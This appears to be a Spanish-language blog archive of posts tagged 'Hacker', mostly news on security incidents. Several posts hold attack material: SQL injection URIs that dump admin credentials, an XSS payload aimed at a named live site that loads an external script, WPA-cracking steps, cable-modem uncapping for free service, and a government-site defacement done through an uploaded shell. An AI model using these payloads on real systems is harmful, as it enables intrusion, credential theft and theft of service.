Mostrando las entradas con la etiqueta Hacker. Mostrar todas las entradas
Mostrando las entradas con la etiqueta Hacker. Mostrar todas las entradas

sábado, 23 de julio de 2011

HTML5 IE enabling script

Codigo Javascript necesario para que funcione correctamente código HTML5 en Internet Explorer.

<!--[if lt IE 9]>
<script src="http://html5shim.googlecode.com/svn/trunk/html5.js"></script>
<![endif]-->

sábado, 25 de junio de 2011

TeamPoison ataca el sitio de LulzSec


El grupo de hackers LulzSec no ha dejado de dar de que hablar, parece que están dispuestos a atacar todo lo que sea posible, como si de un deporte se tratara, pero esta vez son noticia no precisamente por haber penetrado algún otro reconocido sitio, sino porque ahora ellos fueron víctimas de un ataque.

Fuente conecti.ca

jueves, 27 de enero de 2011

¿Qué tan seguro es Facebook?

Facebook aseguró que un "error de programación" fue el culpable de la aparición de un extraño mensaje que parecía provenir del fundador de la empresa, Mark Zuckerberg.

En el mensaje, publicado en la madrugada del miércoles a nombre del multimillonario de 26 años en la página de fans de Facebook, se decía que era una buena idea que el sitio se convirtiera en un "negocio social" con inversión de sus usuarios.

"Que el hackeo comience. Si Facebook necesita dinero, en vez de ir a los bancos, ¿por qué Facebook no permite a sus usuarios invertir en Facebook de una forma social?", preguntaba.

La red social emitió un comunicado explicando la situación: "Un error de programación permitió la publicación de mensajes de estado por parte de personas no autorizadas en un puñado de páginas. El error ha sido corregido".

Según Facebook ningún perfil de usuario fue afectado por el incidente. Además, el sitio dio a conocer nuevas medidas de seguridad.

Pero la empresa de seguridad Sophos afirmó que era mejor que los usuarios de la red social tomaran precauciones.

Y algunos analistas consideran que la red social no está haciendo lo suficiente para mostrar a sus usuarios que su información está segura.

Más vale prevenir...

La irrupción en la cuenta corporativa de Zuckerberg es la segunda que sufre un personaje famoso en la red social en las últimas semanas. El anterior fue el presidente francés Nicolás Sarkozy.

"Los usuarios de Facebook -famosos o no- necesitan cuidar más la seguridad de su red social", dijo Graham Cluley, consultor de Sophos.

"Quizá Mark Zuckerberg quiera poner más atención al a configuración de su privacidad y seguridad tras esta embarazosa irrupción, y considerar quién tiene permitido publicar mensajes en su nombre".

"No es claro si descuidó su contraseña, si alguien la obtuvo en forma fraudulenta, o si se sentó en un Starbucks y se la robaron al usar una red inalámbrica abierta, pero sin importar como haya ocurrido lo ridiculizó justo cuando Facebook quiere reafirmar a sus usuarios que toma su seguridad y privacidad seriamente", señaló Cluley.

El mensaje del hacker fue visto por decenas de miles de personas antes de ser retirado del sitio. El texto contenía vínculos a una entrada de Wikipedia sobre negocios sociales y a un torneo de hackers organizado por Facebook.

¿Sabes quiénes son tus amigos?

Por lo pronto, este miércoles Facebook anunció una serie de nuevas medidas de seguridad que buscan impedir que episodios cómo éste se repitan.

Entre ellas la empresa afirma que comenzará a establecer conexiones seguras -con https:// en vez de http://- de forma tal que sus usuarios puedan optar por escoger dicho sistema en vez del convencional.

La característica será puesta a disposición de los usuarios gradualmente y habrá que "activarla dentro de la configuración de seguridad en la cuenta", según el comunicado de Facebook.

Otra opción para autentificar las cuentas es reconocer quiénes son nuestros amigos.

Si el sitio sospecha que alguien se está entrometiendo en una cuenta -si en la mañana ingresó desde Estados Unidos y dos horas más tarde desde Argentina, por ejemplo- pedirá que el usuario compruebe su identidad reconociendo a sus amigos.

El sistema mostrará la foto de uno de los "amigos" del usuario en Facebook y le solicitará que confirme su nombre de entre una lista de opciones. Si lo hace, entrará, si no, será rechazado.

Como medida adicional, desde hace algún tiempo, la red social permite que los usuarios vean desde dónde se están conectando a Facebook para detectar alguna actividad sospechosa.

Esto puede hacerse desde la opción "Configuración de cuenta" y después seleccionando "Seguridad de la cuenta".

domingo, 15 de agosto de 2010

Intentan hackear Campus Party México; recibió más de 2 millones 500 mil ataques



Ciudad de México.- Durante la segunda edición del encuentro digital se registraron más de 2 millones 500 mil intentos de ataques cibernéticos hacia Campus Party México, así como dos desde la sede del evento, informó Leonardo Santiago, líder y responsable de Tecnología de Movistar para Campus.

“Dichos ataques fueron registrados por el Ovni, que es el que soporta y distribuye todas las comunicaciones que se generan dentro de Campus, tecnología que se implementa diariamente en el despliegue de la empresa”, comentó Leonardo Santiago.

Para el evento, se implementaron cinco zonas de seguridad que analizan todo el tráfico entrante y saliente de Campus Party; desde ellas se puede determinan el tipo de ataque y su lugar de procedencia para así tomar las acciones preventivas y correctivas.

Este es el “top five” de los ataques que se recibieron en Campus Party:

-Malware
-De fuerza bruta
-Spam
-A la web en http
-Spyware

Los países desde donde se recibieron más intentos de hackers fueron:

- EU
-China
-Canadá
-Brasil
-Hungría
-Rusia

Un ataque que llamó la atención de los encargados de la seguridad web de los campuseros fue uno proveniente de Bahréin – país ubicado en la región del golfo Pérsico en Asia, comparte fronteras marítimas con Arabia Saudita-; ya se investiga el tipo de evento específico.

De los dos intentos de hacking internos, uno fue para intentar acceder a los equipos que soportan toda la Campus y el otro estaba dirigido hacia una página del Gobierno de Coalcomán, Michoacán, pero “con la tecnología que usamos nos hemos podido defender, ubicar a la persona y tomar las medidas”, apuntó el vocero técnico de la empresa.

Comentó que a eso dos campuseros sólo se le pidió que desistieran de ese tipo de hakings y se les permitió seguir en el encuentro digital.

Respecto al lanzamiento de la tecnología 3.5G de Telefónica, Leonardo Santiago aseguró que está “permite una conexión a internet con ayuda de una USB de acceso móvil, con la capacidad de navegar a 2megabits en segundos, que es la velocidad promedio que tenemos en casa a través de un cable”.

Por último, señaló que el Ovni registró durante el evento un total de tráfico transmitido de 180 terabytes.

fuente milenio

lunes, 10 de mayo de 2010

Un hacker robó de Facebook 1,5 millones de contraseñas


Moscú, 24 de abril, RIA Novosti. Un hacker de origen supuestamente ruso robó nombres y contraseñas de hasta 1,5 millones de usuarios de Facebook, la mayor red social del planeta, informó el sitio web de la cadena de televisión estadounidense ABC News.

Expertos de VeriSign's iDefense Labs, una empresa especializada en la investigación de ataques informáticos, descubrió que un tal Kirllos vende esa información a precios de ganga en una web clandestina de hackers. El malhechor pide 25 centavos del dólar por cada cuenta, mientras que nombres de usuarios de correo electrónico y contraseñas correspondientes suelen costar entre uno y veinte dólares.

Se sospecha que Kirllos ya vendió unas 700 mil cuentas pero VeriSign's iDefense Labs no pudo comprobar, si son cuentas legítimas y pertenecientes a usuarios reales. En principio, un millón 500 mil usuarios de Facebook, es decir, uno de cada 300, podrían verse afectados por ese robo.

Via rian.ru

domingo, 7 de marzo de 2010

Jaulas Chroot

Wn este artículo se dará una explicación del funcionamiento de las Jaulas Chroot centrados en el sistema operativo Linux. Muy útiles para mejorar el aspecto de la seguridad de los sistemas, les dejo el enlace a elhacker.

Nos vemos

lunes, 22 de febrero de 2010

Ataques de phishing constantes sobre bancomer

Aqui tenemos un nuevo ejemplo de ataques de phishers, para que se den una idea de lo sencillo que es armar este tipo de estafas... y lo sencillo que es caer en este tipo de anzuelos, ya que no falta cada desprevenido que deja sus cuentas por todos lados.

Veamos,

Sitio web del atacante
 

Sitio web de bancomer

 

Chequen la diferencia, en el sitio web atacante se puede ver la URL: http://208.53.181.167/homemenu/
A diferencia de la pagina oficial de bancomer: http://www.bancomer.com/

Y el anzuelo es un email como este:


 

Bueno, asi que mucho cuidado con andar proporcionando datos en sitios... aunque digan gusanito, bancomer, banamex, msn, o lo que diga,,, aguas. 
Porque si te modificaron el archivo host ni cuenta te vas a dar, saludos...

domingo, 19 de julio de 2009

Le roban los datos a Twitter por un "pasword"


Twitter ha sido esta semana víctima de un pirata informático que ha robado cientos de documentos, hasta 300, de la popular red social y los ha remitido a diferentes empresas de Internet.

Una de estas empresas,
TechCrunch, ha publicado -tras un debate sobre la conveniencia o no de hacerlo- parte del material sustraído, entre los que figuran documentos corporativos sobre sus empleados, números de teléfono y currículos.

Entre la documentación robada y enviados a la mencionada web de noticias de tecnología TechCrunch, la cual ha desvelado sólo aquellos datos que han considerado que por "su valor noticioso era apropiado publicar ", según aseguró Michael Arrington, fundador y coeditor de esta publicación.

La información recolectada también refleja las expectativas en cuanto a usuarios de Twitter, que esperan sumar más de 25 millones para final de año. Y a número de empleados. Para 2013, la compañía espera llegar a 5.200 empleados, sumar 1.000 millones de usuarios, 1.540 millones de dólares de ingresos y 1.100 millones de ganancias netas, según ha informado el diario económico Cinco Días.

Según la
BBC, el hacker -conocido como ´Hacker Croll´- sería de origen francés y presumiblemente accedió a la información adivinando la contraseña de un empleado de Twitter hace un mes. En este sentido, Robin Wauters, uno de los empleados de Techcrunch ha revelado en su blog que una de las contraseñas utilizadas por los trabajadores de la red social para entrar en su servidor era literalmente ´password´.

Via
20minutos

jueves, 9 de julio de 2009

El hacker más famoso del mundo visita Campus Party


Kevin Mitnick, lleva más de 15 años explorando e investigando la vulnerabilidad de los sistemas operativos y de las herramientas de comunicación de las empresas.

La segunda edición de Campus Party en Colombia ha vuelto a abrir sus puertas al público general para que disfrute, durante una semana, de la posibilidad de divertirse y explorar la tecnología. Se trata de una verdadera fiesta tecnológica no sólo para los 3.500 participantes, sino para los miles de bogotanos que se acercan a Corferias para conocer el mayor evento de tecnología, creatividad, ocio y cultura digital en Red del mundo.

Este año, la cita ha contado, además, con la presencia del famoso hacker Kevin Mitnick, quien ayer visitó las instalaciones. Con más de 15 años de experiencia explorando e investigando la vulnerabilidad de los sistemas operativos y de las herramientas de comunicación de las empresas, Mitnick ha compartido con los periodistas y campuseros lo que para él es hoy la mayor amenaza de seguridad: “la ingeniería social, un tipo de ataque altamente efectivo que potencia el elemento humano de la seguridad corporativa”. Para Mitnik es esencial que las empresas tengan presente no sólo la tecnología sino las personas y los procesos de trabajo en la organización a la hora de desarrollar programas de seguridad. Sólo así “se podrán evitar ataques de hackers que a diferencia del pasado hoy no actúan para superar un reto informático, sino motivados por la posibilidad de ganancia económica”.

El público visitante podrá interactuar con lo último en robótica y realidad virtual

Las áreas que hacen de Campus Party Colombia un evento para el disfrute de todos los bogotanos son Campus Futuro y la zona de Inclusión Digital. La primera es una exposición interactiva, que sirve como escaparate tecnológico donde mostrar las últimas innovaciones y proyectos llegados de todo el mundo. Una de las atracciones destacadas es LevelHead, un juego de memoria espacial que sorprenderá a todos los asistentes. Su creador, el neozelandés Julian Oliver, asegura que revolucionará el mundo de los videojuegos. Entre los protagonistas humanoides de Campus Futuro se encuentran Dabot y Chief Cook, dos robots capaces de aprender nuevas funciones partiendo de la enseñanza humana, bien sea por imitación de hábitos de comportamiento o por aprendizaje. Tanto el juego como los robots repetirán experiencia campusera, puesto que serán también expuestos en Valencia.

Por otro lado, en el área de Inclusión Digital, Internet se pone al alcance de todos los bogotanos a través de los bautizos digitales, promovidos por Campus Party y la Secretaría de Desarrollo Económico de la ciudad. Estas acciones permiten a todas aquellas personas que no han tenido la oportunidad de usar un ordenador o conocer Internet, empaparse del espíritu campusero y acceder a conocimientos sobre la forma de divertirse, relacionarse, aprender o crear a través de los adelantos tecnológico y de la Red.

La experiencia de la Zona Abierta, que también será replicada en Valencia, aúna así los objetivos de Campus Party: por un lado, acercar la tecnología a los ciudadanos, y por otro ser un foro de innovación, creatividad, ciencia y ocio digital, desde el que se construye la nueva realidad gracias a la creación de contenidos y la consistencia formativa del evento.

Via http://www.ticpymes.es/

jueves, 18 de junio de 2009

Demostración: obteniendo la clave bajo el cifrado wpa




Pasos para obtener una clave bajo el cifrado wpa:
1. Tener disponible un buen diccionario de palabras clave.
2. Monitorear la red inalámbrica.
3. Desautenticar los clientes para obtener el handshake.
4. Ejecutar arcrack-ng para desencriptar la clave wpa.

Nos vemos!

En cuanto me alcance para un router con cifrado wpa/wpa2 hago mi demostración, mientras tanto... nos vemos.

domingo, 15 de marzo de 2009

El 'hacker del Pentágono' pierde su batalla contra la extradición a EE.UU.

Londres. (EFE).- El pirata informático británico Gary McKinnon, conocido como 'Solo', ha perdido su batalla contra la extradición a EE.UU. al rechazar la fiscalía del Reino Unido procesarle en este país.

Los representantes legales de McKinnon pidieron al fiscal en diciembre que le procesara aquí por delitos menores, después de que el interesado, de 42 años, firmara una declaración en la que admitía haber violado la ley británica de abuso informático de 1990. Pero la fiscalía ha rechazado presentar cargos contra el acusado al amparo de esa legislación, ya que considera que las alegaciones de Estados Unidos son mucho más graves.

EE.UU. le reclama por presuntas "actividades informáticas fraudulentas", después de que el pirata accediera ilegalmente a varios de sus sistemas, que se suponen los más seguros del planeta, entre febrero del 2001 y marzo del 2002, como ordenadores de la Administración Nacional de Aeronáutica y del Espacio (NASA), el Ejército, la Marina, el Departamento de Defensa y la Fuerza Aérea.

El pasado 28 de agosto, el Tribunal Europeo de Derechos Humanos rechazó el recurso contra la extradición que había presentado McKinnon, que entró en los ordenadores del Gobierno estadounidense antes y después de los atentados del 11 de septiembre del 2001 (11-S).

El británico alegó en esa ocasión que, de ser condenado en EE.UU., podría sufrir tratos inhumanos o degradantes, argumento que aparece en la Convención Europea de Derechos Humanos.

'Solo' había perdido el 30 de julio del 2008 otro recurso judicial en la Cámara de los Lores del Reino Unido, que respondía a una sentencia anterior del Tribunal Superior, que en 2007 ordenó su extradición.

El presunto "cíber-delincuente" puede ser condenado en EE.UU. a una pena de varias décadas de prisión, además de cuantiosas multas, ya que la Fiscalía sostiene, entre otras cosas, que modificó y borró archivos en una instalación naval poco después de los atentados del 11-S, lo que dejó los sistemas no operativos.

'Solo' admite que accedió a los ordenadores desde su vivienda en Londres, pero asegura que no pretendía sabotearlos, sino que sólo buscaba información sobre ovnis, a fin de destapar una supuesta conspiración para ocultar avistamientos.

La defensa de Gary McKinnon ha alegado que su cliente no es un terrorista ni un simpatizante del terrorismo, y sostiene que el Gobierno británico rechaza procesarle para permitir a la Administración estadounidense dar ejemplo con su caso. Además, señalan que el experto informático entró en los ordenadores estadounidenses no por malicia sino por "ingenuidad", ya que padece el síndrome de Asperger, un tipo de autismo, por lo que no debe ser considerado un delincuente.

via lavanguardia












La web de Tussam, "hackeada" por un usuario descontento


La web de la empresa de autobuses de Sevilla Tussam podría haber sido «hackeada» durante la mañana de hoy por un usuario cansado del servicio de la empresa.

Según meneame.net, el "hacker" dejó un mensaje en la web de Tussam el que se queja abiertamente de los malos servicios y adjuntaba una foto de Nelson, uno de los personajes de la serie The Simpsons.

Así, se puede leer: "Gracias por hacerme esperar el autobús más de 1 hora todos los días. Gracias por unos precios tan abusivos. Gracias por tener que aguantar en pie 30 minutos de recorrido. En fin, Gracias por vuestra total ineptitud".

"No comprendo como prestáis un servicio tan ineficiente y luego pretendéis que la gente pague de su bolsillo tonterías como los monitores de los autobuses. Por hacer bonos de viaje con transbordo que no sirven de nada. Pues te pegas 1 hora esperando cada autobús".

Via abcdesevilla

viernes, 30 de enero de 2009

Descarga directa de Wifislax 3.1 o Backtrack 3,

WIFISLAX

Wifislax versión 3.1 (683MB)

http://download.wifislax.com:8080/wifislax-3.1.iso

ftp://files.tuto-fr.com:8080/distro/wifislax-3.1.iso

http://www.comprawifi-wifislax.com/public/wifislax/3.1/wifislax-3.1.iso

El md5 del fichero wifislax-3.1.iso es 911dc29262ee117e5e27770067bd2e71

Wifiway versión 1.0 Final

664.6 megas (MB)

Descarga 1 wifiway-1-final.iso -> http://download.wifislax.com:8080/wifiway-1-final.iso

The md5 of file wifiway-1.0-final.iso is 2fac135cad7b185706bbcb9c51f45932

BACKTRACK

Description: Imagen de cd
Name:: bt3-final.iso
Size: 695 MB
MD5: f79cbfbcd25147df32f5f6dfa287c2d9
SHA1: 471f0e41931366517ea8bffe910fb09a815e42c7
Download: http://www.remote-exploit.org/cgi-bin/fileget?version=bt3-cd

Description: USB Version (Extended)
Name:: bt3final_usb.iso
Size: 784 MB
MD5: 5d27c768e9c2fef61bbc208c78dadf22
SHA1: 3aceedea0e8e70fff2e7f7a7f3039704014e980f
Download: http://www.remote-exploit.org/cgi-bin/fileget?version=bt3-usb

Description: VMware Image
Name: BACKTRACK3_VMWare.rar
Size: 689 MB
MD5: 94212d3c24cf439644f158d90094ed6a
SHA1: 21c9a3f9658133efff259adbe290723583b4fd82
Download: http://www.remote-exploit.org/cgi-bin/fileget?version=bt3-vm

Via:
http://www.wifislax.com/index.php
http://www.remote-exploit.org/backtrack.html

Nota legal: El uso de este software de análisis wireless debe ser una herramienta básica para profesionales y particulares que ansían conocer el nivel de seguridad de sus instalaciones inalámbricas, queda totalmente prohibido el uso de la misma para cometer actos delictivos de intrusión sobre las redes wireless de las cuales no somos propietarios o no tenemos los permisos pertinentes para analizar su nivel de seguridad. Es vuestra responsabilidad mantener la idea principal por la que se creo seguridad wireless y todo su entorno.

viernes, 16 de enero de 2009

EEUU reclama la extradición del hacker que entró en la NASA

Gary McKinnon es una celebridad entre la comunidad hacker. Este informático, nacido en Glasgow y residente en Londres, consiguió colarse en los ordenadores del Pentágono, la NASA y el Departamento de Defensa de EEUU entre febrero de 2001 y marzo de 2002.

Allí husmeó entre secretos militares, e incluso aseguró haber encontrado la foto de un ovni, aunque lamentable no pudo obtener una copia que lo demostrara. De hecho, McKinnon aseguró que ese era el objetivo de sus incursiones, aunque se le acusó luego de delitos mucho más graves.

Y es que al margen de discusiones sobre si realmente McKinnon localizó la imagen del ovni o es fruto de su imaginación, lo cierto es que las incursiones en los sistemas de seguridad militar de EEUU no hicieron ninguna gracia a las autoridades de ese país, que ahora reclaman la extradición del hacker.

De producirse la deportación, McKinnon se enfrentaría a acusaciones por violar secretos militares, que podrían condenarle a una pena de hasta 70 años de cárcel. Además, las autoridades norteamericanas le acusan de haber causado daños económicos por valor de 800.000 dólares, aunque McKinnon siempre ha negado que causara ningún tipo de daño con sus actividades.

Para intentar evitar enfrentarse a la Justicia de EEUU, McKinonn ha firmado una declaración en la que se declara culpable de otros delitos informáticos regulados por la legislación británica. Ahora está a la espera de la respuesta del Fiscal General, en el último paso de una batalla legal para evitar la deportación que dura ya seis años.

McKinnon sufre de Síndrome de Asperger, un trastorno psíquico relacionado con el autismo. Algunos de sus síntomas son los comportamientos repetitivos y obsesivos, y la falta de habilidades sociales. Según la familia de McKinnon, esta enfermedad explicaría su comportamiento.

Desde luego, no deja de llamar la atención algunas contradicciones de su personalidad, como el hecho de que demostrara gran habilidad para colarse en redes de alta seguridad, pero fuera fácilmente descubierto por utilizar su dirección real de correo electrónico… Por no mencionar su obsesión por demostrar la existencia de vida extraterrestre.

En una entrevista al diario The Times, la madre de McKinnon defiende la inocencia de su hijo. Lejos de los que lo califican de terrorista informático, sostiene que la “travesura” de su hijo fue consecuencia de sus problemas psíquicos: “No es un genio, Es bueno, pero no es el mejor. No tenían contraseñas ni firewalls, y ese es el problema. Gary les avergonzó. Quieren buscar un cabeza de turco por delitos informáticos, y piensan que Gary es una presa fácil. Creo que los gobiernos tratan de asustar a la gente. Crean villanos y amenazas para justificar algunas de sus acciones”

Lógicamente, en Estados Unidos tienen una visión mucho menos complaciente de sus actividades. Entre otras cosas, se le acusa de haber dejado fuera de servicio 300 ordenadores de una base militar norteamericana después de los ataques del 11-S. Sus acciones se consideran como “un intento calculado e intencionado de influir y afectar al Gobierno de los EEUU mediante la intimidación y la coerción”.

¿Villano o hacker inofensivo? La Justicia deberá decidirlo.

http://www.baquia.com/noticias.php?id=14502

lunes, 8 de diciembre de 2008

Deface a la página de gobierno sinaloa.gob.mx

Hoy por la noche, la página del gobierno del estado de Sinaloa recibió la alerta de fallos de seguridad de su sitio web de los cuales hasta el momento no tenemos detalle.
El fallo de seguridad es de gravedad y ya ha sido resueldo gracias al experto en seguridad informatica Nesok, el cual dedicó tan sólo algunos minutos de su tiempo para corregir ese fallo. Claro, anteponiendo su nombre en la página principal del sitio con el fin de que lo contacten para intercambiar puntos de vista ó que posteriormente lo contraten como miembro del equipo de sinaloa.gob.mx como se ve en la imagen a continuación.

Seguimos al pendiente.


[EDITADO]
Inmediantamente me puse en contacto con Nesok, quien me proporcionó los detalles del fallo de seguridad.
¿Cuál fue el fallo principal del sitio web? y ¿Cómo logró conectarse al servidor? - Le pregunté a Nesok.
- El problema surgió de un password request forgery. Luego entre al panel de administración y subí una shell, modifiqué los archivos de configuración y saqué la cuenta de root, lo demás sólo fué conectarme por ssh, para modificar el index y tambien arregle el fallo para que otros no pudieran dañar la información, de hecho todo está intacto, sólo cambié el index.- Contestó Nesok.

Lunes 8 de Diciembre 12:40pm.

domingo, 9 de noviembre de 2008

¿Qué es uncap, uncapping o uncapear? ¿Cómo aumentar la velocidad la conexión cable?

Uncapping o Uncap son técnicas para poder modificar la configuración de un cable modem que originalmente viene bloqueado de fábrica (actualizar firmware, modificar parámetros, HFC Mac Address, Config File, etc.). Esta técnica es usada con fines poco éticos, es decir, su motivación es acceder de forma gratuita al servicio de internet. También es usado para conseguir obtener mayores velocidades de conexión, tanto de bajada como de subida.

En la actualidad los modems más usados por los operadores de cable son los vulnerables a este tipo de técnicas: Motorola, 3Com, Thomson, RCA, WebStar y COM21, entre otros.

Motorola:

* Serie Eurodocsis
o Motorola sb4100e
o Motorola sb4101e
o Motorola sb4200e
o Motorola sb5100e
o Motorola sb5101e
o Motorola sb5120e

* Serie Docsis
o Motorola sb3100, sb3100i y sb3100d
o Motorola sb4100 y sb4100i
o Motorola sb4101 y sb4101i
o Motorola sb4200 y sb4200i
o Motorola sb5100 y sb5100i
o Motorola sb5101 y sb5101i
o Motorola sb5120
o Motorola sbg900

3Com:

* Serie Eurodocsis/docsis
o 3Com "Aleta de tiburón"

Thomson / RCA:

* Serie Eurodocsis/docsis
o TCM290
o TCM410
o TCM420
o TCM425

WebStar:

* Serie Eurodocsis/docsis
o EPC2k100r2
o EPC2100

COM21:

* Serie Eurodocsis/docsis
o COM21 DOXPORT 1000 series


Para acceder a las opciones ocultas de configuración, es decir, cambiar HFC MAC Address, Config File, Número de serie, se emplea un cable llamado Blackcat, especialmente para los cable modem Motorola SB5100 y SB5101, y en menor medida para los SB4200, SB4101 y SB4100 (sean todos de la serie DOCSIS o EURODOCSIS). Para estos tres últimos, es más adecuado programarlos con un cable Serial fabricado con el chip MAX232 o MAX233, sirviendo este cable inclusive para el cable modem Motorola SB3100.

Links de interés:

* Cable blackcat SB5101
* Cable blackcat SB5100
* Cable serial MAX232


Fuente: megaunder.com.ar

Software necesario: TECNiSO.Net

viernes, 7 de noviembre de 2008

YourFreeWorld Jokes Site Script 'categorie' Parameter SQL Injection Vulnerability

Attackers can use a browser to exploit this issue.

The following example URIs are available:

http://www.example.com/jokesite/jokes.php?catagorie=-1%20union%20select%201,convert(concat(database(),char(58),user(),char(58),version()),char)/*

http://www.example.com/jokes.php?catagorie=-5+UNION+SELECT+1,concat(0x3a,Username,0x3a,Password)+from+adminsettings--

fuente:
http://www.securityfocus.com/bid/28963/exploit

martes, 23 de septiembre de 2008

Wireshark (Ethereal) - Sniffer

Wireshark, antes conocido como Ethereal, es un analizador de protocolos utilizado para realizar análisis y solucionar problemas en redes de comunicaciones para desarrollo de software y protocolos, y como una herramienta didáctica para educación. Cuenta con todas las características estándar de un analizador de protocolos.

La funcionalidad que provee es similar a la de tcpdump, pero añade una interfaz gráfica y muchas opciones de organización y filtrado de información. Así, permite ver todo el tráfico que pasa a través de una red (usualmente una red Ethernet, aunque es compatible con algunas otras) estableciendo la configuración en modo promiscuo. También incluye una versión basada en texto llamada tshark.
Permite examinar datos de una red viva o de un archivo de captura salvado en disco. Se puede analizar la información capturada, a través de los detalles y sumarios por cada paquete. Wireshark incluye un completo lenguaje para filtrar lo que queremos ver y la habilidad de mostrar el flujo reconstruido de una sesión de TCP.

Wireshark es software libre, y se ejecuta sobre la mayoría de sistemas operativos Unix y compatibles, incluyendo Linux, Solaris, FreeBSD, NetBSD, OpenBSD, y Mac OS X, así como en Microsoft Windows.

Aspectos importantes de Wireshark

Mantenido bajo la licencia GPL
Trabaja tanto en modo promiscuo como en modo no promiscuo
Puede capturar datos de la red o leer datos almacenados en un archivo (de una captura previa)
Basado en la librería pcap
Tiene una interfaz muy flexible
Capacidades de filtrado muy ricas y frescas
Admite el formato estándar de archivos tcpdump
Reconstrucción de sesiones TCP
Se ejecuta en más de 20 plataformas
Es compatible con más de 480 protocolos
Puede leer archivos de captura de más de 20 productos


Seguridad

Para capturar paquetes directamente de la interfaz de red, generalmente se necesitan permisos de ejecución especiales. Es por esta razón que Wireshark es ejecutado con permisos de
Superusuario. Tomando en cuenta la gran cantidad de analizadores de protocolo que posee, los cuales son ejecutados cuando un paquete llega a la interfaz, el riesgo de un error en el código del analizador podría poner en riesgo la seguridad del sistema (como por ejemplo permitir la ejecución de código externo). Por ésta razón el equipo de desarrolladores de OpenBSD decidió remover Ethereal antes del lanzamiento de la versión 3.6.[1]
Una alternativa es ejecutar
tcpdump o dumpcap que viene en la distribución de Wireshark en modo Superusuario, para capturar los paquetes desde la interfaz de red y almacenarlos en el disco, para después analizarlos ejecutando Wireshark con menores privilegios y leyendo el archivo con los paquetes para su posterior análisis.

Portabilidad


Wireshark corre en sistemas operativos tipo
Unix, incluyendo Linux, Solaris, FreeBSD, NetBSD, OpenBSD, Mac OS X, Microsoft Windows, U3 y en Portable Apps

Fuente:
wikipedia

Haga clic
aqui para descargar wireshark.

domingo, 21 de septiembre de 2008

Alerta Grave de XSS en guflox.info


Solo vean la imagen, no se valida correctamente la variable la búsqueda de datos. :

Variable afectada:
http://guflox.info/buscar.php?q=

Ejemplo:
http://guflox.info/buscar.php?q=%3CSCRIPT%20SRC=//ha.ckers.org/.j%3E

Los administradores ya se dieron cuenta del error.

Etiquetas

INTERNET (459) newsweek (305) SEGURIDAD (224) software (136) HACK (86) GOOGLE (47) Hacker (46) Geek (41) hardware (36) WINDOWS (34) Hackers (31) CRACK (29) facebook (29) video (28) DESCARGA (27) videos (26) Celulares (25) MICROSOFT (22) Informatica (21) apple (19) GRATIS (18) technology (18) virus (18) exploit (17) computación (16) informatico (16) web (15) cracker (14) INALAMBRICO (13) WINDOWS 7 (13) noticias (11) MSN (10) termino (10) ACTUALIZACION (9) Gamer (9) LapTops (9) Mac (9) PASSWORD (9) WINDOWS XP (9) dns (9) firefox (9) juegos (9) FOTOS (8) cientifico (8) iphone (8) WEP (7) antivirus (7) bibliografia (7) Desencriptar (6) INFINITUM (6) wifi (6) youtube (6) Craker (5) Culiacan (5) DESMOSTRACION (5) TELEFONIA (5) gmail (5) messenger (5) DIRECTA (4) DOWNLOAD (4) ESPAÑOL (4) XBOX (4) xss (4) Glosario (3) HTML (3) WPA (3) anuncios (3) ataques (3) hosting (3) hotmail (3) Guru (2) ajax (2) wpa2 (2)